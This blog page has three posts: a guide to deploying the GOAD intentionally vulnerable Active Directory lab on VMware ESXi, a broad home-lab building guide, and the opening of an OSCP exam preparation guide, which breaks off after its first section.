NetSec Focus

Setting Up and Installing GOAD or GOAD-Light on VMware ESXi

Wed, 21 Aug 2024 00:00:00 +0000

Setting Up and Installing GOAD or GOAD-Light on VMware ESXi

Introduction
A Word of Caution
A Word of Advice
Requirements to Deploy GOAD
Current ESXi Setup
Configure GOAD Network Group
Obtain Required Packages to Deploy GOAD with Our Linux Machine
Stage 1: Deploying the GOAD Environment
Conclusion

Introduction

Over the years, I’ve been refining and automating vulnerable Active Directory environments in my homelab for testing. However, as these setups I created grew in complexity, managing the tools, scripts, and resources became a challenge. I needed a more efficient way to quickly spin up and tear down these environments without the hassle. That’s when I discovered GOAD by Orange Cyberdefense. In my experience, it is a game-changer for anyone serious about Active Directory security testing.

GOAD is a comprehensive Active Directory (AD) lab environment designed for security testing, training, and learning purposes. It allows pentesters or security researches to simulate real-world AD environments to practice various attack and defense techniques. The lab is highly customizable, enabling users to configure different scenarios, user accounts, policies, and network topologies to mirror a production AD setup.

In this guide, I will walk you through the steps needed to install and configure GOAD on VMware ESXi.

A word of Caution:

This lab environment is intentionally vulnerable. Do not reuse this setup for production environments, and ensure it is isolated from any production networks. Never deploy it on the internet without strict isolation measures.

A word of Advice:

As of the time of writing, the Orange-Cyberdefense team has not yet merged the contributions from viris and fsacer into the main GOAD project. Their forked versions of GOAD include the vmware_esxi provider, which we’ll be using for deployment. If you want to review and compare the enhancements they’ve made, you can check out their work:

Viris version of GOAD: https://github.com/viris/GOAD Fsacer version of GOAD: https://github.com/fsacer/GOAD

Requirements to deploy GOAD:

Before deploying the GOAD environment on your ESXi server there are a few things we need to configure:

Disk Space: A minimum of 125GB or more is needed to build the lab.
Memory: A minimum of 6-8GB should be allocated for each system in the lab.
Networking: We will need the ability to create port groups to ensure our GOAD builder can create the necessary connections and interfaces to seperate it from our personal network.

Operating System:

This lab is designed to be installed from a Linux host, and all testing has been conducted using Linux! While some users have successfully set up the lab from a Windows OS, this requires a slightly different approach VM Creation: VMs can be created on Windows using Vagrant.

Ansible Provisioning: The provisioning part must be executed from a Linux machine. If you choose to use a Windows OS for VM creation, ensure the following for the Linux machine used in provisioning:

Network Configuration: The Linux machine must have two network adapters.

One set to “VM Network” and the other connected to the same virtual private network or network port group as the lab. This ensures proper communication between the VMs and the provisioning scripts.

It is up to you to decide which operating system you want to use to deploy GOAD but in this situation we are going to use Linux to deploy it.

Current ESXI Setup:

Here is current setup that I will be using to deploy the GOAD environment:

Hardware: CPU: 24 CPUs x Intel(R) Xeon(R) CPU E5-2690 v3 @ 2.60GHz Memory: 400GB DDR4 Storage: 4TB of lab storage ESXI Version: 8.0 Update 2

Configure GOAD network Group

Before we setup our linux system to build the GOAD environment we need to create a network port group that will use the virtual private network for the lab.

Once you login into your ESXI console, on the left-hand menu, click on “Networking” under the “Navigator” pane.

Under the “Port groups” tab, identify the virtual switch (vSwitch) where you want to create the new port group. Click on the “Add port group” button.

Name: Enter GOAD as the name of the new port group. VLAN ID: If required, specify a VLAN ID. Leave it as 0 if no VLAN tagging is needed. Security: Optionally configure settings like Promiscuous mode, MAC Address changes, and Forged Transmits as needed.

Save the Configuration:

Click “Add” to create the port group.

Ensure that the new port group GOAD appears in the list of port groups under the selected vSwitch.

Obtain required packages to deploy GOAD with our Linux machine.

Note: While deploying the GOAD environment, I used my Kali Linux system to accomplish this. The instructions I am providing should also work for other Linux Operating systems. You may have to install some other packages and plugins to make sure the lab can be deployed properly in your ESXI server.

Remember you want to have two network interfaces configured on your Kali Linux system. One interface should be connected to your VM Network and the other interface should be connected to the GOAD network. Otherwise GOAD will not deploy the systems and set the network configurations properly during the deployment.

By default the GOAD network has the boxes set to be on the 192.168.56.0/24 network. For the second interface that connected to the GOAD environment, I set my Kali Linux to 192.168.56.2 with a /24 subnet and the gateway set as 192.168.56.1.

Installing the following packages:

Vagrant: 

sudo apt install vagrant
sudo apt install ansible
sudo apt install ansible core
sudo pip3 install pywinrm

Install Vagrant ESXI Plugins:

vagrant plugin install vagrant-vmware-esxi
vagrant plugin install vagrant-reload
vagrant plugin install vagrant-vmware-desktop
vagrant plugin install winrm
vagrant plugin install winrm-fs
vagrant plugin install winrm-elevated

Install VMware OVFTool

Thanks to broadcom for changing VMware URL structure it took me some time to find the latest version of OVFtool for Linux.

Source: https://developer.broadcom.com/tools/open-virtualization-format-ovf-tool/latest

Download the “OVF Tool for Linux Zip” package. The current version we used is 4.6.3.

Once you downloaded the zip file and extracted the files on your Kali Linux machine you can either echo the path in your environment variable or you can add the path to your .bashrc file.

tjnull@auto-kali:~/Downloads/VMware-ovftool-4.6.3-24031167-lin.x86_64/ovftool$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

tjnull@auto-kali:~/Downloads/VMware-ovftool-4.6.3-24031167-lin.x86_64/ovftool$export PATH=/home/tjnull/VMware-ovftool-4.6.3-24031167-lin.x86_64/ovftool:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

Once our path has been added and we verified ovftool can be loaded into our terminal, we can now start the process to deploy GOAD.

Stage 1: Deploying the GOAD Environment

Now we have the necessary packages, plugins, and tools installed, we need to make some changes to the configuration files in the vmware_esxi directory listed in the provider folder. To do this, we are going to do the following:

tjnull@auto-kali:git clone https://github.com/viris/GOAD
tjnull@auto-kali:cd GOAD/ad/providers/vmware_esxi
tjnull@auto-kali: ls -a
. .. .env inventory .vagrant Vagrantfile

In the .env file, make the necessary changes to make sure GOAD can connect to your ESXI Server:

tjnull@conops:/opt/GOAD/ad/GOAD/providers/vmware_esxi$ cat .env
export GOAD_VAGRANT_ESXIHOSTNAME='10.10.10.10'
export GOAD_VAGRANT_ESXIUSERNAME='root'
export GOAD_VAGRANT_ESXIPASSWORD='password'
export GOAD_VAGRANT_ESXINETNAT='VM Network'
export GOAD_VAGRANT_ESXINETDOM='GOAD'
export GOAD_VAGRANT_ESXISTORE='datastore1'
tjnull@conops:/opt/GOAD/ad/GOAD/providers/vmware_esxi$

You do not need to make any changes to the Vagrantfile or to the inventory file! To see if vagrant can reach the ESXI server you can type ‘vagrant up’ and vagrant will begin to deploy the GOAD virtual machines to your VMware ESXI Server. This does not run the ansible playbooks to deploy the vulnerable configurations to those machines.

The vagrantfile already has the systems set to the 192.168.56.0/24 network.

If you choose to not do this and you want to run the entire the deployment and ansible configuration setup at the same time we can use the GOAD script to do this. Deploying the environment this way can become very time consuming!

tjnull@auto-kali:/opt/GOAD/$ ./goad.sh -t check -l GOAD -p vmware_esxi -m local

From the script you should see in your output a list of checks that GOAD will run. Read through the results and if it passes you should then you can start the installation by running the following command:

tjnull@auto-kali:/opt/GOAD/$ ./goad.sh -t install -l GOAD -p vmware_esxi -m local

If you ran the vagrant up command and you see your virtual machines were installed in ESXI, then you can run the following command:

tjnull@auto-kali:/opt/GOAD/$ ./goad.sh -t check -l GOAD -p vmware_esxi -m local -a

The -a option will only run the ansible playbooks and will apply the vulnerable configurations into the active directory environment. The installation will take some time to deploy. Once the deployment has completed you will get a notification in your output and you can now begin assessing the GOAD environment!

Conclusion

A huge shoutout to Viris and Fsacer for creating the vmware_esxi provider for GOAD. I think it is an exceptional environment for any infosec professional looking to sharpen their skills in Active Directory security. It provides a realistic, fully-featured Active Directory environment that is intentionally vulnerable, offering an ideal playground for practicing attack techniques, testing detection tools, and exploring defense strategies. By investing time in GOAD, you gain hands-on experience with real-world scenarios, enabling you to better understand the complexities of Active Directory exploitation and defense. It’s an invaluable resource for both learning and advancing your expertise in securing critical infrastructure.

TJnull's guide to building a Home Lab

Sun, 31 Jul 2022 00:00:00 +0000

Introduction
A word of advice
Why should you build a home lab?
Things you need to consider
Hardware
Hunting for Hardware
Network
Software
Virtualization Software
Network Virtual Devices
Operating Systems
Windows
Unix and *Nix
Apple Mac OS
Daemons/Services
Monitoring Services/Systems
Other Resources
Conclusion

Introduction:

When I started my infosec journey, I remember attending an awesome talk called "The AVATAR Project and You" by da_667 at BSIDES Charm 2017. Da_667 talked about a guide he was writing about building your own lab environment which would allow you to tailor it to suit your own needs. This talk and his book "building virtual machine labs a hands-on guide" was where my journey would begin so that I could build my home lab.

In this guide I will provide a variety of tips, tools, and resources to help you get some ideas on how to build your home lab.

A word of advice:

This guide does not contain all the answers you will need to build your home lab. You should use it as a way for getting ideas on how you want to build your home lab. In addition, you should also think about the type of environment you want to set up to practice/build your skillset. After all, this should be a fun and exciting adventure to try out!

Take the time to do your research.

Why should you build a home lab?

This lab should be the place you want to use it to build your skills whether you are in infosec or IT. Having a home lab will allow you to try out new things and build different topologies. A home lab should be a place where you can be able to build anything you need and tear down when things go wrong.

It is important to have a separate system that does not contain any important data such as personal files, sensitive information, etc. This system/lab will be your playground.

Things you need to consider:

Before you decide to spin up an entire datacenter in your house (you do not need to do that, trust me) there are some things you want to think about. Here are some questions you should ask yourself first:

What are you building this lab for?
What is your budget? How much are you willing to spend?
- Will you have enough funds to continue to maintain and also scale it?
Do you have the ability to set up a wired network? If not, will you be able to set up a wireless connection?
How many virtual machines do you want to run and utilize?
- What are the system requirements for each virtual machine?
- Do you plan to have backups for these systems?
Will this lab be running in your house all the time?
- Will you have enough power to run your home lab?
- Do you have a dedicated area that has proper cooling?
If you are thinking of buying a server, do you have enough space in your home? Rack or tower?
Have you mapped out what the network is going to look like?

Once you have answered these questions, you can move forward.

Hardware

Depending on the situation, the machine you are using may not be enough to start your lab. However, you can still do a lot of things.

Upgrading Hardware:

It is important to look into the following parts to upgrade in your system:

RAM/memory: The more RAM you have in your system, the better performance to run the projects you need.

Storage: Depending on the project/systems you want to spin up, you are going to need some drives to store all of it. Having multiple drives will make it easier to consolidate your machines and also give you the ability to conduct backups in case something happens. In addition, you can look into getting a network attached storage (NAS) to consolidate your machines in a separate place.

If you want to find a place that reviews the different types of drives or storage solutions https://www.storagereview.com/consumer is a good place to find recommendations.

CPU: More cores and a better CPU clock speed will allow you to run multiple tasks on your system. Make sure that your CPU is able to run the CPU Virtualization feature if you plan to run virtual machines on your systems.

Dedicated Machine:

Having a dedicated machine or converting an old machine is a great way to run your virtual machines in a separate environment. Keep in mind, all three areas which are mentioned in 'Upgrading Hardware' (CPU, RAM, hard drive) need to have highest priority when you plan to have a dedicated machine.

If you choose to get into password cracking, using GPUs instead of CPUs increases the cracking speed by a factor of hundreds, if not thousands. However, the specifications of this machine would need to be different as power cooling and space becomes more of an issue.

Additional Hardware:

There are a variety of devices that you can find to expand your lab, but it depends on what you want to learn and what you would like to try out. Here are a few devices that you should look into having:

Firewalls/routers/switches
Raspberry Pi
Wireless access points/wireless network cards
IOT devices

Hunting for Hardware:

Depending on the budget you have and the requirements for hardware that you want, there are a variety options to choose for setting up your lab:

PC Parts/Components:

https://pcpartpicker.com/list/: This site is a good start if you want to compare the parts/specs that you may be looking for. In addition, the site includes a price comparison option to show you what retailer is selling the part/component for a lower price. They also have users who share their custom builds to give other people an idea of how they want to build out their computers which you could use to figure out your lab.

Small Form Factor Builds:

Raspberry Pi (https://www.raspberrypi.org/): An affordable single-board computer that has the power to run a variety of different projects that can be added to your lab. It has the ability to run different Linux distributions that you can use for your lab projects.

Intel NUCs (https://www.intel.com/content/www/us/en/products/boards-kits/nuc.html): Do not be fooled by the form factor of these mini PCs as they do pack a punch. This would be a good system if you are looking to save power, reduce noise, and most importantly, save space.

AMD Mini PCs (https://www.amd.com/en/products/embedded-minipc-solutions): AMD also has their own set of small form computers that you can purchase as well. They can be able to run the Ryzen processor chipset as well on some of them.

Minis Forum (https://store.minisforum.com/): A place to buy barebone mini PC’s depending on use case you need. They have custom options and you can select for your builds and they are very affordable with the selections they have.

Servers:

As technology continues to be improved, older technology needs to be decommissioned or have an end of life (EOL). As these servers get decommissioned, this is also a good chance to repurpose them for your project. Before you decide to buy a server, you need to answer the following questions:

Do you have enough space to buy a server? What form factor will you be looking to buy (tower or rack)
Do you have enough power and are you okay with handling the cost of running the server depending on how you have it on?
Does your budget include also buying parts to upgrade/maintain the server?
Are you okay if the server is noisy? (There is a reason why we have data centers!)
Can you provide sufficient airflow or cooling?

If you have answered these questions and are okay with your answers, then you are ready to obtain a server! There are a lot of good resources to help you find a server and the hardware you need for it. Here are some resources you can use to help you find a server for your lab:

Lab Gopher (https://labgopher.com/): The best place to look for buying a server! This site allows you to parse through servers that are listed on ebay that match the criteria you are looking for. You can filter options like RAM, storage, type of server, etc to find the one that you can use for your lab.

Other places to buy servers:

Save My Server: https://www.savemyserver.com/
Homelabtech: https://www.homelabtech.com/
Gear Grabber: https://geargrabber.io/
Server Monkey: https://www.servermonkey.com/
Reddit HomelabSales: https://www.reddit.com/r/homelabsales/
Local E-Recycling centers
Craigslist (be careful with sellers on there!)

Other resources for buying a server/hardware:

Reddit home lab server guide: https://www.reddit.com/r/homelab/wiki/hardware

Network:

Having your own network setup can give you the ability to build your computer networking skills and to learn more about how your network is operating. Building your own network will allow you to isolate/segment your lab from your personal network, transfer files, and isolate certain systems from accessing the internet.

If you want to purchase your own network hardware, you should look for network equipment that will be able to utilize the network speed you are receiving from your ISP. However, you can also virtualize your network if you plan to virtualize your entire lab on the hardware you have. You could even use a Raspberry Pi (depending on the model) to run your network firewall or router.

Finding network hardware:

https://www.reddit.com/r/homelabsales
Gear Grabber: https://geargrabber.io/
https://www.cablesandkits.com/ (Cisco Lab Equipment)

Software:

Once you have the hardware set up, it is time to decide what software you want to use for your lab. Here are a few types of software that you should think about implementing:

Virtualization software
Network virtual devices
Operating systems
Daemons/services

Virtualization Software:

There are different types of virtualization software that you can use to run your virtual machines in your lab. One of the main benefits of using virtualization software is you have the ability to create snapshots which allow you to revert the system to a known state. Keep in mind that each virtualization software offers their own benefits depending on the situation you are planning to utilize them in your lab.

Virtualization software that you can run on your desktop:

VMware Workstation Player (free, but has limited uses such as running only one virtual machine)
VMware Workstation (paid, only for Windows and Linux)
VMware Fusion (paid, available for MAC Only)
Virtual Box (free, but has limited performance issues)
Hyper-V (not available for Windows 10 Home)
QEMU (free, open source)

Virtualization software that you can run on your server:

VMware ESXI
Hyper-V (Windows Server)
Proxmox
Xen

Note: If you are planning to run your hypervisor on a wireless connection, I would recommend using Hyper-V or Proxmox because VMware-ESXI does not support the drivers for wireless devices. Make sure the wireless card that you are using can support the Infrastructure mode.

Containers:

When you are setting up a virtualized environment, containers can be a good solution that allows you to run certain applications, services, or tools in an isolated environment. In addition, these containers can be easily spun up and taken down when you are doing testing on certain programs. In order for you to run containers in your lab, you will need a host operating system and software that will run the containers. Here is a list of programs that you can use to spin up containers:

Docker (https://www.docker.com/): free to use and easy to use.
Vagrant (https://www.vagrantup.com/): If you plan to use VMWare with it you will need to buy it.
Kubernetes (https://kubernetes.io/)

Network Virtual Devices:

In case you do not have the ability to purchase your own hardware network equipment, you may be able to run some of these network devices as a virtual machine to manage the network in your lab. Here is a list of certain network devices that you can virtualize for your lab.

Routers:

GNS3 (https://gns3.com/software/download-vm): A network software emulator that allows you to simulate the network you are trying to build. In addition, you can leverage your existing hardware and you can expand your lab with the OS.
dd-wrt (https://dd-wrt.com/): Another open source router platform that can provide router functionality and additional services for virtual networks. (Note: It is commonly used on hardware devices that can support it, but it can be ran as a virtual appliance as well.)
linux-router (https://github.com/garywill/linux-router: A linux application that has the ability to make changes to the linux system to be used as a router, hotspot, or a transparent proxy server.

Firewalls:

pfSense (https://pfsense.org): An open source firewall with a variety of features that a commercial-class firewall would have. In addition, you can install packages to improve the security of your network.
OPNSense (https://opnsense.org/): Just like pfSense, withs a higher-end graphical web interface.
ClearOS (https://www.clearos.com/): Another firewall you can play with. Keep in mind, only the community version is free. If you want access to the home version you will need to pay a subscription for it.

For Raspberry Pi you could also run Pi-Hole (https://pi-hole.net/). The Pi-Hole is a Linux network-level advertisement and Internet tracker application blocker which acts as a DNS sinkhole. When the Pi-Hole is configured it will act as a DNS Server on your private network.

Operating Systems:

In infosec it is important to learn both variants of Windows and Linux systems because you need to understand the fundamentals of these operating systems. Most corporations will have a mix of Windows or Linux systems in their environment that need to be protected. If a attack occurs you will need to assess the system and if you do not know how to analyze both of these operating systems, then you are in trouble. Having these operating systems in your home lab is where learning the fundamentals of the Linux or Windows operating system is essential.

Windows:

Due to the license with which Microsoft Windows is distributed, a valid license needs to be purchased to cover the number of instances installed. However, the Microsoft Evaluation Center gives you the ability to run certain operating systems for a certain amount of time (90-120 days).

Here are the only systems you can get from the Microsoft Evaluation Center: https://www.microsoft.com/en-us/evalcenter/

Windows 10 Enterprise (32 or 64 bit)
Windows Server 2019 (32 or 64 bit)

Finding old versions of Windows can be tough but with a little help from Google we can find some shares that have them hosted publicly. Archive.org (https://archive.org) is another place to find older versions of Windows. Take your time to find the versions you are looking for as some of the files may not be actual the ISOs you need.

Alternatively, a Visual Studio subscription can be purchased, allowing access to a wide range of Windows versions, both currently for sale and discontinued.

If you are a college student or you have a college email address you may have the ability to access OnTheHub. OnTheHub is a discount center for students that can download products from Microsoft, Adobe, VMware and much more. If you want to know if your school is registered you can check here: https://onthehub.com/search

Unix and *Nix:

In the beginning there was UNIX. This name is trademarked and given to systems which meet Single UNIX Specification (SUS). (Using the term UNIX in any other manner __isn't technically allowed_.)_ From UNIX grew Berkeley Software Distribution (BSD) sometimes called Berkeley Unix or BSD UNIX and similar UNIX operating systems, which didn't fully meet the specification. (From BSD UNIX came Darwin, which is the core of Apple OS X & iOS).

BSD - FreeBSD, OpenBSD, Solaris

These similar UNIX OSs included MINIX, and various of the BSD which did not fully meet their criteria. With the growth of these UNIX clones (referred to as *NIX) variations formed, such as Linux.

The Linux system is derived from UNIX as it is a continuation of the basis of UNIX design. Linux also refers to the kernel of the GNU/Linux Operating system, as the original code was developed by Linus Torvalds and the GNU Foundation. Each Linux distribution consists of having a Linux kernel, GNU system, GNU utilities, libraries, compiler, additional software, documentation, a window system, a window manager, and a desktop environment.

Linux Debian-based - Example: Debian, Ubuntu, antiX
Linux Arch-based: Manjaro, ArcoLinux, Anarchy Linux
Linux Slackware-based - Example: Slax, SuSE
Linux RPM-based - Example: Red Hat, CentOS, Fedora

Wikipedia has a detailed list of the family tree of Linux which can be found here. Websites have been set up to track the updates of their releases; a good project is Distro Watch.

There is a wide range of operating systems which have been mentioned in the above lines, the vast majority of them free and open source. However, there are a few which are commercial.

With this in mind, you are able to freely download and try many of the OS types. Using them will help you build up UNIX and *NIX skills, giving you a deeper computer knowledge.

Apple Mac OS:

This OS has been designed to use Apple's hardware (using it on non-Apple hardware is breaking their EULA). Various different virtualizing solutions (VMware Fusion and Parallel Desktop - neither are free) support OS X as a guest OS, allowing for a VM to be created on which to practice.

Daemons/Services

After you have selected a few operating systems you want to run in your home lab, you should figure out what kind of programs or services you want to run on them. Keep in mind that certain services will only run on certain operating systems, so you will need to make sure you are using the correct operating system to run that desired service.

Here are a few recommendations of services that you should learn how to set up and play with.File/Storage Services:

Web Services:

Apache (https://httpd.apache.org/)
Apache Tomcat (http://tomcat.apache.org/)
NGINX (https://www.nginx.com/)
Lighttpd (https://www.lighttpd.net/)
Node.js (https://nodejs.org/en/)

Can only be installed on Windows:

Internet Information Services (IIS) (https://www.iis.net/)

Other Services:

DHCP Server
DNS Server
Mail Server
Active Directory (Must be installed through Windows Server)

Monitoring Services/Systems:

Once you have set up all your services, you are going to need some software or systems that pack a variety of security monitoring tools into it. After all, if you want to be in infosec you need to understand how certain attacks work and how to defend against it.

Monitoring Systems:

Security Onion (https://securityonion.net/): A Linux-based system that is packed with a variety of open source security monitoring tools that you can test out.
TPot (https://github.com/telekom-security/tpotce): A Linux-based system that contains a variety of honeypot services that you can run for monitoring and to understand how attackers are trying to access your network. Would recommend spinning this up as a research project for fun.

Monitoring Services:

Although Security Onion packs a variety of tools into one system, it can be tough to learn all of them at once. It is important to learn how to configure some of these monitoring services manually for the first time and it also might be enough for what you need. Here are some services we recommend looking into depending on what type of monitoring you want to conduct on your home lab:

Network Intrusion Detection/Prevention Services:

Host-Based Endpoint Detection Services:

Velociraptor (https://www.velocidex.com/): An open source tool for collecting host-based state information that can be used to hunt/monitor suspicious activities on a system.
Bluespawn (https://github.com/ION28/BLUESPAWN): An open source endpoint detection and response tool that can be used to identify, detect, and remove malicious activity on a system.
Wazuh (https://github.com/wazuh/wazuh): An open source host-based intrusion detection system that can detect threats, intrusion attempts, system anomalies, and much more. It has a server that is used to analyze the data and the agent can be installed on different systems to detect these threats.

Endpoint Log Collectors:

Sysmon (https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon): A Windows system service that allows you to log system activity to the Windows event log. The detailed information it collects can be passed through an event collection program or through a SIEM.
OSQuery (https://github.com/osquery/osquery): An open source tool that allows you to query for various system information. By using SQL statements to create your own queries, you can use it to detect and analyze for various types of threats that could be on the system.

Security Information and Event Management (SIEM) Tools:

With all of the data you are going to be collecting and reviewing, you are going to need a SIEM to review it all at once. Security Onion and Tpot both use Elasticsearch, Logstash, and Kibana to help visualize the data you see. However, there are some other alternatives that people in the infosec community use as their SIEM. Here are some tools you may be interested in playing with:

Splunk (https://splunk.com): A very popular SIEM tool that enterprise companies use to correlate the data or events in their network. Although Splunk has a free tier, it has a limit to only ingest 500MB of data per day. If you want to expand that limit, you can request a developer license and it will be able to ingest 50GB of data per day. The license will need to be renewed every six months. Here is the link to request a license: https://www.splunk.com/en_us/resources/personalized-dev-test-licenses.html
Graylog (https://www.graylog.org/): Another open source SIEM that can collect logs from almost any device. It has a nice visualization board that you can configure to display the data you want to visualize.
HELK (https://github.com/Cyb3rWard0g/HELK): An open source threat hunting platform that uses open source tools such Elasticsearch, Logstash, and Kibana with advance hunting analytics capabilities to review the data that can be ingested into it. The platform is simple and easy to deploy. This community project was founded by Cyb3rWard0g and is still being maintained.
DetectionLab (https://github.com/clong/DetectionLab): A collection of packer and vagrant scripts that builds an entire Active Directory environment with a set of endpoint security tools. The scripts also have the ability to implement a variety of logging practices that you can review for testing purposes. The lab is customizable and it'seasy to make modifications in the config scripts.

Other Resources:

This section contains a variety of links I saved when I was looking to build my home lab.

Hardware:

Ubiquiti: https://www.ui.com/products/#default
Startech (https://www.startech.com/): A company to get network equipment/cables from.

Government auction sites to find servers or network equipment:

Keep in mind what you bid on – if you win the bid you only have a few days to pick it up!

Public Surplus: http://www.publicsurplus.com/
Govdeals: https://www.govdeals.com/index.cfm

Raspberry Pi:

Building your own Raspberry Pi Cluster:

Cluster Boards:

Turingpi: https://turingpi.com/
Pi Dramble: http://www.pidramble.com/

Networking:

pfSense Resources:

Documentation: https://docs.netgate.com/pfsense/en/latest/*
Reddit: https://www.reddit.com/r/PFSENSE/
Lawrence Systems PFsense Tutorials: https://www.youtube.com/watch?v=fsdm5uc_LsU&list=PLjGQNuuUzvmsuXCoj6g6vm1N-ZeLJso6o

DD-WRT:

Documentation: https://wiki.dd-wrt.com/wiki/index.php/Installation

Software:

https://github.com/awesome-selfhosted/awesome-selfhosted

Tools to Draw Network Diagrams:

Online Tools:

Draw.io: https://app.diagrams.net/

Creately: https://app.creately.com/diagram/

LucidChart: https://www.lucidchart.com/pages/

Offline Tools:

Microsoft Visio: https://www.microsoft.com/en-us/microsoft-365/visio/flowchart-software

Edraw: https://www.edrawsoft.com/edraw-max/

Windows:

Windows Active Directory: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview

Building a Domain Lab: https://social.technet.microsoft.com/wiki/contents/articles/36438.windows-server-2016-build-a-windows-domain-lab-at-home-for-free.aspx#Download
Building an Effective Active Directory Environment: https://adsecurity.org/?p=2653
Building an Active Directory Lab by SethSec: https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html
Practices for Securing Active Directory: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory

Tool/Scripts to automate the deployment of your Windows Lab:

WSLab: https://github.com/microsoft/WSLab
AutomatedLab: https://github.com/AutomatedLab/AutomatedLab
Invoke-UserSimulator: https://github.com/ubeeri/Invoke-UserSimulator
ADImporter: [https://github.com/curi0usJack/ADImporter](https://github.com/curi0usJack/ADImporter%5C)

Linux:

Tools:

Centrify (Active Directory Integration): https://www.centrify.com/pam/authentication-service/active-directory-bridging/integration/

This tool allows you to integrate your linux systems into Active Directory and they can be able to easily join the domain. This allow provides the ability to do single sign-on (SSO)

Other Tools/Scripts for Lab Automation:

These tools can be used to automate some of the manual work you will have to do in your homelab. Depending on which tool you use, it will take some time to understand how they work but it can save hours from rebuilding those systems from scratch.

Terraform: https://www.terraform.io/

Ansible: https://www.ansible.com/resources/get-started

Puppet: https://puppet.com/

Conclusion:

Having a home lab is a great way to build your skills and experience. It is important to be patient when you decide to build your lab and customize it the way you like it. There are a variety of ways to build a home lab, but make sure the way you build it matches your intended purpose. Most importantly, I hope the resources and tips that I have provided in this guide will give you a good baseline to get started.

The Journey to Try Harder: TJnull’s Preparation Guide for PEN-200 PWK/OSCP 2.0

Thu, 06 May 2021 00:00:00 +0000

Overview
Dedication
A Word of Warning!
Section 1: General Course Information
Section 2: Getting Comfortable with Kali Linux
Section 3: Linux Command Line Kung-Fu
Section 4: Essential Tools in Kali
Section 5: Getting Started with Bash Scripting
Section 6: Passive Reconnaissance
Section 7: Active Reconnaissance
Section 8: Vulnerability Scanning
Section 9: Web Application Attacks
Section 10: Buffer Overflows for Windows and Linux
Section 11: Client-Side Attacks
Section 12: Working with Public Exploits
Section 13: Transferring Files to your target
Section 14: Antivirus Bypassing
Section 15: Privilege Escalation
Section 16: Password Cracking
Section 17: Port Redirection and Pivoting
Section 18: Active Directory Attacks
Section 19: Metasploit Framework
Section 20: PowerShell Empire
Extra Resources
Setting up your Pentesting Environment
Wargames/Hands-on Challenges
Capture the Flag Competitions (CTFs)/Cyber Competitions
Bug Bounty Programs
Vulnerable Machines
Tips to participate in the Proctored OSCP exam
Other Resources
Conclusion

Overview:

After releasing the first version of my PWK/OSCP guide, Offsec released an update to the PWK/OSCP and included a key classification system to help students understand how course designation work. The PWK/OSCP is classified as PEN-200 and after spending some time reviewing the course I decided that I wanted to create an update version to help future students out there prepare for the new PEN-200. For those of you that have read my previous version you will notice there may be some sections that still have the same resources but you will also notice new resources for each section. I have taken to time to make sure that the information and my advice will help prepare for your adventure to take the PEN-200 PWK/OSCP!

For those of you that would like to know about my journey when I took the course and exam, you can find my earlier post here: https://www.netsecfocus.com/oscp/review/2019/01/29/An_Adventure_to_Try_Harder_Tjnulls_OSCP_Journey.html

If you are still going through the old labs and course material, you find the first guide here: https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html

Dedication:

As always a big shout out goes to abatchy! Without his guide I would have never started exploring for other resources. Thank you for creating your original guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob

I also want to thank the following people for taking the time to read and provide feedback for the updated version of this guide:

This guide has been approved by Offensive Security for PEN-200!

A Word of Warning!:

Do not expect these resources to be the main thing you use for obtaining OSCP. When you are ready to take the course, you should expect the following:

Spending a lot of time researching.
Do not expect the student admins or even other students to give you answers easily; put in the effort to research your questions.
Plan to make a commitment to this and have an open mindset to learning new things.
Everyone prepares differently and mentally. Learn to build your own strategy/methodology that works for you when you are improving your practical skills.
Know your tools! There are certain tools that you cannot use for the exam. However, that does not mean you should skip over them. Take some time to understand them because you may have to use them on an actual engagement or in the field.
Be careful when using Automated Tools: Automated tools can improve your performance and reduce the time taken in your methodology when assessing a target. However, the automated tools created by these developers have certain features or create scripts that combine common tools to automate their findings. These tools can miss services or findings that you should be looking for. It would be best if you take the time to understand how things work manually.
Remember Offensive Security motto: TRY HARDER https://www.offensive-security.com/offsec/what-it-means-to-try-harder/

As of now Offensive Security has restricted the following tools:

Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
Automatic exploitation tools. (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.)
Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)
Features in other tools that utilize either forbidden or restricted exam limitations
Any tools that perform similar functions as those above are also prohibited. You are ultimately responsible for knowing what features or external utilities any chosen tool is using. The primary objective of the OSCP exam is to evaluate your skills in identifying and exploiting vulnerabilities, not in automating the process.
Use Case for Understanding the Tools/Scripts you use in a Pentest: https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/

Reference: https://support.offensive-security.com/oscp-exam-guide/

Most importantly: Have fun! You will learn a lot from this course, take your time to understand the material and this guide. Do not forget to take breaks and spend time away from the electronics. Trust me you do not want to burn yourself out.

Course Syllabus

The 2nd most important resource that I used to help me prepare for the course: https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf

From the syllabus I will breakdown each section by providing you the resources I used to prepare for the course. Once I finish going through the syllabus, I will also be providing some extra resources that came in handy. You don’t need to use this guide in order; feel free to jump around as it suits you.

General Course Information
Getting Comfortable with Kali Linux
Linux Command Line Kung-Fu
Essential Tools in Kali
Getting Started with Bash Scripting
Passive Reconnaissance
Active Reconnaissance
Vulnerability Scanning
Web Application Attacks
Windows/Linux Buffer Overflows
Client-Side Attacks
Working with Public Exploits
File Transfer
Antivirus Bypassing
Privilege Escalation
Password Attacks
Tunnelling/Pivoting
Active Directory Attacks
Introduction to the Metasploit Framework
PowerShell Empire

Section 1: General Course Information

This section provides an overview of what you should expect on the course. The PDF guide you will receive with your course materials contains a list of resources and how you should approach the material and lab environment. I highly recommend to you read the restrictions carefully and the OffSec perception of how a report is created. Those sections are really going to help you understand how you should be taking your notes, writing your report, what to expect when your are testing the lab environment, and also what you should be careful of doing when you are going through the course.

